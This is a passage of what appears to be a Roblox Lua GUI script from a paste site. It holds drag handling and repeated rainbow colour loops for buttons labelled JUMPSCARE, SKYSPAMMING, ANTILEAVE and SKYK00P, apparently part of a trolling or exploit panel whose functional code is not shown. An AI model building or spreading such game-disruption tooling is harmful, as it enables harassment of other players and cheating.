  681. if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  682. dragToggle = true
  683. dragStart = input.Position
  684. startPos = Frame.Position
  685. input.Changed:Connect(function()
  686. if input.UserInputState == Enum.UserInputState.End then
  687. dragToggle = false
  688. end
  689. end)
  690. end
  691. end)
  692. Frame.InputChanged:Connect(function(input)
  693. if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  694. dragInput = input
  695. end
  696. end)
  697. game:GetService("UserInputService").InputChanged:Connect(function(input)
  698. if input == dragInput and dragToggle then
  699. updateInput(input)
  700. end
  701. end)
  702. end
  703.  
  704. dragify(script.Parent)
  705. end
  706. coroutine.wrap(QFCS_fake_script)()
  707. local function PKIPWI_fake_script() -- TOADROAD.LocalScript
  708. local script = Instance.new('LocalScript', TOADROAD)
  709.  
  710. while wait() do
  711. for i = 0,255,5 do
  712. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  713. wait(0.01)
  714. end
  715. for i = 255,0,-5 do
  716. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  717. wait(0.01)
  718. end
  719. for i = 0,255,5 do
  720. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  721. wait(0.01)
  722. end
  723. for i = 255,0,-5 do
  724. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  725. wait(0.01)
  726. end
  727. for i = 0,255,5 do
  728. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  729. wait(0.01)
  730. end
  731. for i = 255,0,-5 do
  732. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  733. wait(0.01)
  734. end
  735. end
  736. end
  737. coroutine.wrap(PKIPWI_fake_script)()
  738. local function PKIPWI_fake_script() -- JUMPSCARE.LocalScript
  739. local script = Instance.new('LocalScript', JUMPSCARE)
  740.  
  741. while wait() do
  742. for i = 0,255,5 do
  743. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  744. wait(0.01)
  745. end
  746. for i = 255,0,-5 do
  747. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  748. wait(0.01)
  749. end
  750. for i = 0,255,5 do
  751. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  752. wait(0.01)
  753. end
  754. for i = 255,0,-5 do
  755. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  756. wait(0.01)
  757. end
  758. for i = 0,255,5 do
  759. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  760. wait(0.01)
  761. end
  762. for i = 255,0,-5 do
  763. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  764. wait(0.01)
  765. end
  766. end
  767. end
  768. coroutine.wrap(PKIPWI_fake_script)()
  769. local function PKIPWI_fake_script() -- SKYSPAMMING.LocalScript
  770. local script = Instance.new('LocalScript', SKYSPAMMING)
  771.  
  772. while wait() do
  773. for i = 0,255,5 do
  774. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  775. wait(0.01)
  776. end
  777. for i = 255,0,-5 do
  778. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  779. wait(0.01)
  780. end
  781. for i = 0,255,5 do
  782. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  783. wait(0.01)
  784. end
  785. for i = 255,0,-5 do
  786. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  787. wait(0.01)
  788. end
  789. for i = 0,255,5 do
  790. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  791. wait(0.01)
  792. end
  793. for i = 255,0,-5 do
  794. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  795. wait(0.01)
  796. end
  797. end
  798. end
  799. coroutine.wrap(PKIPWI_fake_script)()
  800. local function PKIPWI_fake_script() -- MESSAGE.LocalScript
  801. local script = Instance.new('LocalScript', MESSAGE)
  802.  
  803. while wait() do
  804. for i = 0,255,5 do
  805. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  806. wait(0.01)
  807. end
  808. for i = 255,0,-5 do
  809. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  810. wait(0.01)
  811. end
  812. for i = 0,255,5 do
  813. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  814. wait(0.01)
  815. end
  816. for i = 255,0,-5 do
  817. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  818. wait(0.01)
  819. end
  820. for i = 0,255,5 do
  821. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  822. wait(0.01)
  823. end
  824. for i = 255,0,-5 do
  825. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  826. wait(0.01)
  827. end
  828. end
  829. end
  830. coroutine.wrap(PKIPWI_fake_script)()
  831. local function PKIPWI_fake_script() -- SKYK00P.LocalScript
  832. local script = Instance.new('LocalScript', SKYK00P)
  833.  
  834. while wait() do
  835. for i = 0,255,5 do
  836. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  837. wait(0.01)
  838. end
  839. for i = 255,0,-5 do
  840. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  841. wait(0.01)
  842. end
  843. for i = 0,255,5 do
  844. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  845. wait(0.01)
  846. end
  847. for i = 255,0,-5 do
  848. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  849. wait(0.01)
  850. end
  851. for i = 0,255,5 do
  852. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  853. wait(0.01)
  854. end
  855. for i = 255,0,-5 do
  856. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  857. wait(0.01)
  858. end
  859. end
  860. end
  861. coroutine.wrap(PKIPWI_fake_script)()
  862. local function PKIPWI_fake_script() -- ANTILEAVE.LocalScript
  863. local script = Instance.new('LocalScript', ANTILEAVE)
  864.  
  865. while wait() do
  866. for i = 0,255,5 do
  867. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  868. wait(0.01)
  869. end
  870. for i = 255,0,-5 do
  871. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  872. wait(0.01)
  873. end
  874. for i = 0,255,5 do
  875. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  876. wait(0.01)
  877. end
  878. for i = 255,0,-5 do
  879. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  880. wait(0.01)
  881. end
  882. for i = 0,255,5 do
  883. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  884. wait(0.01)
  885. end
  886. for i = 255,0,-5 do
  887. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  888. wait(0.01)
  889. end
  890. end
  891. end
  892. coroutine.wrap(PKIPWI_fake_script)()
  893. local function PKIPWI_fake_script() -- SKYK00P.LocalScript
  894. local script = Instance.new('LocalScript', SKYC00L)
  895.  
  896. while wait() do
  897. for i = 0,255,5 do
  898. script.Parent.BackgroundColor3 = Color3.fromRGB(255,i,0) -- change backgroundcolor3 to textcolor3 to make text color rainbow
  899. wait(0.01)
  900. end
  901. for i = 255,0,-5 do
  902. script.Parent.BackgroundColor3 = Color3.fromRGB(i,255,0)
  903. wait(0.01)
  904. end
  905. for i = 0,255,5 do
  906. script.Parent.BackgroundColor3 = Color3.fromRGB(0,255,i)
  907. wait(0.01)
  908. end
  909. for i = 255,0,-5 do
  910. script.Parent.BackgroundColor3 = Color3.fromRGB(0,i,255)
  911. wait(0.01)
  912. end
  913. for i = 0,255,5 do
  914. script.Parent.BackgroundColor3 = Color3.fromRGB(i,0,255)
  915. wait(0.01)
  916. end
  917. for i = 255,0,-5 do
  918. script.Parent.BackgroundColor3 = Color3.fromRGB(255,0,i)
  919. wait(0.01)
  920. end
  921. end
  922. end
  923. coroutine.wrap(PKIPWI_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement